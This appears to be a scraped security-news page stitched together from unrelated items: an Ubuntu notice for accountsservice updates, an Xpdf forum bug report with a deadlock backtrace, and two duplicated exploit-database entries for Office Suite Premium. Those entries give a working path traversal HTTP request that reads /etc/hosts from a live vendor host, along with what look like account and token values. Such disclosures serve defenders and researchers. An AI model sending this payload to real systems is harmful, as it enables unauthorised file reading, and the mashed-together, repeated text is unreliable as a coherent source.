Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   accountsservice                 22.08.8-1ubuntu7.1  
   libaccountsservice0             22.08.8-1ubuntu7.1

Ubuntu 22.10:  
   accountsservice                 22.08.8-1ubuntu1.1  
   libaccountsservice0             22.08.8-1ubuntu1.1

Ubuntu 22.04 LTS:  
   accountsservice                 22.07.5-2ubuntu1.4  
   libaccountsservice0             22.07.5-2ubuntu1.4

Ubuntu 20.04 LTS:  
   accountsservice                 0.6.55-0ubuntu12~20.04.6  
   libaccountsservice0             0.6.55-0ubuntu12~20.04.6

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6190-1  
   CVE-2023-3297

Package Information:  
   https://launchpad.net/ubuntu/+source/accountsservice/22.08.8-1ubuntu7.1  
   https://launchpad.net/ubuntu/+source/accountsservice/22.08.8-1ubuntu1.1  
   https://launchpad.net/ubuntu/+source/accountsservice/22.07.5-2ubuntu1.4  
   https://launchpad.net/ubuntu/+source/accountsservice/0.6.55-0ubuntu12~20.04.6

Ubuntu Security Notice USN-6190-1

Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream.



The program seems to be stuck waiting for a lock while executing the XRef:: getObject StreamObject function. I am not sure if this is a deadlock issue and if it is an error

version:4.04  
reproduce: pdftotext poc.pdf poc.txt  
My system OS：Ubuntu 22.04  
My Compilation Process：

mkdir build  
cd build  
cmake -DCMAKE\_BUILD\_TYPE=Release ..  
make  
sudo make install  
pdftotext poc.pdf poc.txt

Code: Select all

    Program received signal SIGINT, Interrupt.
    __lll_lock_wait (futex=futex@entry=0x55555578a6a0, private=0)
        at lowlevellock.c:52
    52	lowlevellock.c: 没有那个文件或目录.
    (gdb) bt
    #0  __lll_lock_wait (futex=futex@entry=0x55555578a6a0, private=0)
        at lowlevellock.c:52
    #1  0x00007ffff7f9d0a3 in __GI___pthread_mutex_lock (
        mutex=mutex@entry=0x55555578a6a0) at ../nptl/pthread_mutex_lock.c:80
    #2  0x000055555568d140 in XRef::getObjectStreamObject (
        this=this@entry=0x55555578a020, objStrNum=358, objIdx=5, 
        objNum=objNum@entry=361, obj=obj@entry=0x7fffffffdc60)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/XRef.cc:1304
    #3  0x000055555568d797 in XRef::fetch (this=0x55555578a020, num=361, gen=0, 
        obj=0x7fffffffdc60, recursion=1)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/XRef.cc:1266
    #4  0x0000555555672161 in Object::dictLookup (this=0x7fffffffde50, 
        recursion=1, obj=0x7fffffffdc60, key=0x5555556c8d07 "Length")
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Object.h:267
    #5  Parser::makeStream (this=0x5555557d7170, dict=0x7fffffffde50, fileKey=0x0, 
        encAlgorithm=cryptRC4, keyLength=0, objNum=205, objGen=0, recursion=1)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Parser.cc:175
    #6  0x0000555555672a52 in Parser::getObj (this=this@entry=0x5555557d7170, 
        obj=obj@entry=0x7fffffffde50, simpleOnly=simpleOnly@entry=0, fileKey=0x0, 
        encAlgorithm=cryptRC4, keyLength=0, objNum=<optimized out>, 
        objGen=<optimized out>, recursion=<optimized out>)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Parser.cc:103
    #7  0x000055555568d865 in XRef::fetch (this=0x55555578a020, num=205, gen=0,

Unfortunately, even if the test file is compressed, it still exceeds 600KB. Can you increase the upload file size limit on the forum? Or there are other ways to transfer files to you

CVE-2023-3436: xpdf-4.04/xpdf/XRef.cc: XRef::getObjectStreamObject - forum.xpdfreader.com

Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium version 10.9.1.42602 suffers from a path traversal vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Tag

#ubuntu